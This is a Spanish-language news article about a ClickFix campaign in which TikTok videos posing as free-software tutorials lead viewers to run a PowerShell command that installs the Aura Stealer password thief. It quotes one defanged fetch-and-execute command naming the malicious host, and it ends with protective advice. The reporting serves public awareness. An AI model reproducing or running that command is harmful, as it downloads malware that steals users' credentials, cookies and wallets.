Ciberdelincuentes utilizan videos de TikTok para difundir virus que roban contraseñas

Tutoriales virales prometen acceso sin coste a servicios premiun de plataformas como Netflix, Photoshop o Spotify, pero en realidad instalan programas que capturan credenciales y datos privados

Guardar
Los atacantes buscan aprovechar que
Los atacantes buscan aprovechar que este canal es usado por millones de personas de diferentes edades. (Foto: REUTERS/Dado Ruvic/Illustration/File Photo)

El uso de videos en TikTok como herramienta para la propagación de virus informáticos capaces de robar contraseñas ha encendido las alarmas en la comunidad de ciberseguridad.

Una reciente campaña identificada en la plataforma de videos cortos de ByteDance explota la popularidad de guías que prometen acceso gratuito a programas y servicios de pago, como Windows, Netflix o Photoshop, para engañar a los usuarios y comprometer la seguridad de sus dispositivos.

De qué trata este tipo de ciberataque que se difunde a través de TikTok

El responsable del SANS Internet Storm Center (ISC), Xavier Mertens, ha advertido sobre la sofisticación de estos ataques, conocidos como ClickFix, que se presentan como soluciones a supuestos problemas técnicos.

Usuarios caen ante contenido que
Usuarios caen ante contenido que promete mejores servicios o soluciones. (Imagen Ilustrativa Infobae)

Según explicó Mertens en un comunicado publicado en la web de ISC y verificado por Bleeping Computer, los ciberdelincuentes emplean videos que simulan ser tutoriales para desbloquear funciones premium o activar software sin coste.

En realidad, estos contenidos inducen a los usuarios a ejecutar comandos maliciosos en PowerShell, bajo la falsa promesa de obtener acceso gratuito a servicios como Microsoft 365, Adobe Photoshop, Netflix o Spotify.

Cómo engañan a los usuarios de la red social

La técnica de ClickFix se basa en la manipulación mediante ingeniería social. Los videos instruyen a los espectadores para que sigan una serie de pasos, entre los que se incluye la ejecución de un comando corto, como ‘iex (irm slmgr[.]win/photoshop’, presentado como necesario para lograr el objetivo del tutorial.

Los videos fraudulentos prometen funciones
Los videos fraudulentos prometen funciones premium de programas de edición sin ningún costo. (Foto: Adobe Photoshop)

La campaña aprovecha la confianza que los usuarios depositan en los tutoriales de TikTok, una plataforma frecuentada por personas de todas las edades en busca de entretenimiento o información.

Al seguir las instrucciones de estos videos, los usuarios no solo exponen sus dispositivos a infecciones, ponen en riesgo la integridad de todas sus cuentas online.

Qué pasa al seguir las instrucciones del video de TikTok fraudulento

La ejecución del comando es en realidad un fragmento de código malicioso que, al ejecutarse como administrador, conecta el dispositivo con el sitio remoto ‘slmgr[.]win’. Desde allí, se descarga y ejecuta un nuevo script de PowerShell que, a su vez, instala dos archivos ejecutables en el sistema.

Uno de estos ejecutables corresponde a una variante del malware de robo de información conocido como Aura Stealer. Este programa malicioso se especializa en recopilar datos sensibles, como credenciales de acceso almacenadas en navegadores, cookies de autenticación y billeteras de criptomonedas.

El mayor riesgo es la
El mayor riesgo es la recopilación de credenciales de cuentas privadas. (Imagen Ilustrativa Infobae)

El segundo ejecutable, según detalló el experto en ciberseguridad del ISE, se encarga de compilar código bajo demanda, aunque su función final aún no ha sido determinada.

Los expertos en ciberseguridad han subrayado que quienes hayan ejecutado los pasos sugeridos en estos videos deben restablecer las contraseñas de todos los sitios web que utilicen, porque sus credenciales pueden haber quedado comprometidas.

Cómo protegerse de ataques a través de las redes sociales

Si un usuario ejecutó comandos sugeridos en videos de TikTok y sospecha que su dispositivo está comprometido, debe actuar de inmediato. El principal consejo es cambiar todas las contraseñas de servicios utilizados, porque las credenciales pueden haber sido robadas por malware como Aura Stealer.

La verificación de dos pasos
La verificación de dos pasos es una medida esencial de seguridad. (Imagen Ilustrativa Infobae)

Asimismo, se debe realizar un análisis completo con software de seguridad actualizado para detectar y eliminar cualquier archivo sospechoso instalado como parte del ataque. Limpiar el sistema y actualizar los métodos de autenticación refuerza la protección tras un incidente de esta característica.

En adelante, para evitar nuevos riesgos, es fundamental desactivar privilegios de administrador al realizar acciones cotidianas y activar la verificación en dos pasos en las cuentas más importantes.

Filtrar la información consultada, limitar la ejecución de comandos provenientes de tutoriales no oficiales y consultar siempre fuentes de confianza reduce la exposición ante futuras campañas de ingeniería social.